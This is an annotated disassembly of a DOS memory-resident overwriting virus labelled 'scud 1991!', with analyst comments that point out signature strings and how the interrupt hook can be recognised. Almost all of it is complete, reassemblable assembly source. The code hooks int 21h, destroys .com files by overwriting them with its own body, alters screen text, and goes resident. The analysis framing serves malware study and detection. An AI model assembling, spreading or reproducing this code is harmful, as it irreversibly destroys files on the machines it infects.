
;zero-2-o virus - memory resident overwriting virus.

;extremely simple, but it will destroy any file it infects.


;infects .com files (by searching the directory as a direct action would)
;whenever int 21h, function 4bh (execute) is called. at this point, it will
;also change any 0's on the screen (in normal text mode) to o's.

;note: the name 'format.com' appears in this file only because it was the
;last file infected by the virus.

;disassembly by black wolf

; Analyst note: tiny-model, single-segment program. 'org 100h' puts the first
; byte at offset 100h, so every offset quoted below (100h, 109h) is relative
; to the segment the image is loaded into.
.model tiny
.code

org 100h
start:
; The image opens with a jump over the embedded data area to the installation
; code at entry_point. The value in parentheses is the disassembler's
; annotation for the jump target.
jmp entry_point ; (026d)

data_area: ;this is the data area of the file i received. of course,


;since this is mainly dynamic such as the dta, much of
;the data in this area will change with each infection.
;
;analyst note: the values below are a snapshot of one captured sample. only
;the fixed strings ('scud 1991!', '*.com') are stable across copies; the
;saved registers, scratch stack, saved vector and dta contents are runtime
;state and are poor material for a signature.

;caller's sp, ss and ax, saved on entry to int21_handler and restored in
;leave_int21.
store_sp dw 837h
store_ss dw 0b6fh
store_ax dw 4b00h

;start of the region int21_handler uses as its private stack (offset 109h).
;virus_stack..top_of_stack is 4eh (78) bytes long.
virus_stack:

;fixed text marker embedded in the body. it lies at the low end of the
;private stack region, so deep stack use could overwrite it - TODO confirm
;against a live sample before relying on it as the only indicator.
virus_label db 0,0dh,0ah
db 'scud 1991!'
db 0dh, 0ah

;leftover stack contents from the captured sample; not meaningful data.
random_stack_data:
db 0,0,0,0,0f0h,03,0bh,9bh,2ch,0,1,0
db 1,65h,1,6ch,15h,9bh,40h,5,0,6ch,15h,0dfh
db 40h,5,0,93h,1,0,1,0,1,0,1,81h
db 0,0dfh,0ch,6fh,0bh,45h,2,0dfh,0ch,6,0f0h,0
db 1,0,1,6fh,0bh,2ah,9bh,0b9h,41h,6fh,0bh,3
db 0dh,0,4bh
top_of_stack:

db 00h, 00h
;original int 21h vector (offset word, then segment word), filled in by
;entry_point and used for every pass-through call and the final chain jump.
oldint21add dd 0cb00194h
;search mask: no path component, so the search covers the current directory.
filemask db '*.com',0
;handle returned by the create call in overwrite_file.
victims_handle dw 5
;disk transfer area handed to dos for find-first/find-next. the first 26
;bytes (the two db lines below) are dos search state and file metadata.
virusdta db 1,'????????com',0
db 3,0,0,0,2eh,8bh,26h,68h,20h,0,60h,72h,0eh
;offset 1ah into the dta: low word of the matched file's size. the handler
;compares only this word with the virus length. the two bytes that follow
;would be the high word in the standard dos dta layout.
nextfiles_size dw 2d65h
db 0, 0
;offset 1eh into the dta: name of the matched file. 'format.com' is simply
;the last file this sample matched (see the note at the top of the file).
nextfiles_name db 'format.com',0
db 0,0,0,4ah,52h,34h
;-----------------------------------------------------------------------
; int21_handler - resident replacement for the int 21h vector.
; Saves the caller's sp/ss/ax, switches to the private stack inside the
; resident image, and dispatches on ah: function 4bh (load and execute)
; goes to activate_and_infect, every other function goes straight to
; leave_int21, which restores the caller's state and chains to the
; original handler.
; Analyst note: an int 21h vector pointing into a small resident block
; whose code begins by saving sp/ss/ax to cs-relative storage matches this
; handler.
;-----------------------------------------------------------------------
int21_handler:
mov cs:[store_sp],sp
mov cs:[store_ss],ss
mov cs:[store_ax],ax

;this is changed because tasm automatically converts it to a mov sp,109.
;(the instruction is emitted as raw bytes so the reassembled image matches
;the original encoding.)


db 8dh,26h,09h,01h ;lea sp,cs:[109h]
;109h = virus stack (hard-coded offset of virus_stack; it is not
;recomputed from the label)

add sp,top_of_stack-virus_stack ;create stack frame: sp = top_of_stack


mov ax,cs
mov ss,ax ;set ss:sp = cs:(109h+4eh)

mov ax,cs:store_ax ;restore ax to orig.

cmp ah,4bh ;load and execute?


je activate_and_infect
jmp leave_int21 ;any other function: pass through untouched

;-----------------------------------------------------------------------
; activate_and_infect - runs on every intercepted exec (4bh) request.
; 1. Visible payload: walks text-mode video memory at segment 0b800h and
;    replaces every '0' character cell with 'o'.
; 2. Points the dta at virusdta and searches for '*.com' (attribute mask
;    0) through the saved original int 21h vector.
; 3. Skips any match whose size word equals the virus length and
;    continues with find-next; the first match of any other size is passed
;    to overwrite_file.
; Every dos call is made as pushf + far call to oldint21add, i.e. a
; simulated interrupt that bypasses the hooked vector.
; Analyst note: the size comparison is the only "already infected" test,
; so overwritten files all have the same length (end_virus-start) as the
; resident body.
;-----------------------------------------------------------------------
activate_and_infect:
push ax bx cx dx ds es si di
mov ax,0b800h
mov ds,ax ;ds:bx = video memory for
mov bx,0 ; normal text mode.
change_0_to_o:
mov al,[bx] ;get character on screen
cmp al,'0' ;is it a '0'?
jne goto_next_char ;no, put it back and go on...
mov al,'o' ;yes, change it to 'o'

goto_next_char:
mov [bx],al ;place character back onto
inc bx ;screen.
inc bx ;go to next character... (step 2: the odd bytes are not touched)
cmp bx,1000h ;check if we are a little
jne change_0_to_o ;past the end of screen.

mov ax,cs
mov ds,ax
mov dx,offset virusdta
mov ah,1ah ;dos function 1ah: set dta to ds:dx

pushf
call cs:oldint21add ;set dta....

mov ax,cs
mov ds,ax
mov dx,offset filemask
mov cx,0 ;attribute mask 0
mov ah,4eh ;dos function 4eh: find first

pushf
call cs:oldint21add ;find first match...

jc done_infections ;no match at all: nothing to do
cmp nextfiles_size,end_virus-start ;size word == virus length?
jne overwrite_file ;different size: treat as not yet overwritten

findnextfile:
mov ah,4fh ;dos function 4fh: find next

pushf
call cs:oldint21add

jc done_infections ;search exhausted
cmp nextfiles_size,end_virus-start
jne overwrite_file
jmp short findnextfile ;same size as the virus: skip and keep looking

;-----------------------------------------------------------------------
; overwrite_file - replaces the matched file with a copy of the virus.
; Calls dos function 3ch on nextfiles_name (which truncates an existing
; file), writes end_virus-start bytes from ds:100h, and closes the handle.
; Control then falls into done_infections, so one file is overwritten per
; intercepted exec request.
; Analyst note: the host's original contents are discarded by the
; truncate, not relocated, so an affected file cannot be disinfected and
; has to be restored from a known-good copy.
;-----------------------------------------------------------------------
overwrite_file:
mov ax,cs
mov ds,ax
mov dx,offset nextfiles_name ;file name taken from the dta
mov ah,3ch
mov cx,0 ;attributes for the created file: none
pushf
call cs:oldint21add ;truncate/create file...

mov victims_handle,ax ;save victim's file handle


mov ax,cs
mov ds,ax
mov bx,victims_handle
mov cx,end_virus-start ;length = whole virus image
mov dx,100h ;source = start of the image in memory
mov ah,40h
pushf
call cs:oldint21add ;write virus to file..

mov bx,victims_handle
mov ah,3eh ;and close it...
pushf

call cs:oldint21add

;restore the registers pushed at activate_and_infect (reverse order).
done_infections:
pop di si es ds dx cx bx ax

;-----------------------------------------------------------------------
; leave_int21 - common exit of the hook.
; Restores the caller's sp, ss and ax from the cs-relative save slots and
; jumps (not calls) to the original int 21h handler, so the intercepted
; request is serviced normally and returns directly to the caller.
;-----------------------------------------------------------------------
leave_int21:
mov sp,cs:store_sp
mov ax,cs:store_ss
mov ss,ax
mov ax,cs:store_ax ;ax was used as scratch above; reload the request
jmp cs:oldint21add ;far jump through the saved vector

;-----------------------------------------------------------------------
; entry_point - installation code, reached from the jump at start.
; Sets ds/es/ss to cs, reads the current int 21h vector (function 3521h)
; into oldint21add, points the vector at int21_handler (function 2521h),
; then terminates and stays resident via int 27h with dx = offset
; end_virus, keeping the whole image in memory.
; Analyst note: no code that runs an original host program is present;
; the run ends at the int 27h, which is consistent with the overwriting
; behaviour described in the file header.
;-----------------------------------------------------------------------
entry_point:
mov ax,cs
mov ds,ax
mov es,ax
mov ss,ax
mov ax,3521h
int 21h ;get int 21 address... (returned in es:bx)

mov word ptr oldint21add,bx ;offset half of the saved vector


mov word ptr oldint21add+2,es ;segment half of the saved vector
mov ax,cs
mov ds,ax ;ds:dx must address the new handler
mov ax,2521h
mov dx,offset int21_handler
int 21h ;set it to viral handler
mov dx,offset end_virus ;resident size: everything below end_virus
int 27h ;go tsr

;end of the image; end_virus-start is the length used for the size check
;and for the write in overwrite_file.
end_virus:
end start
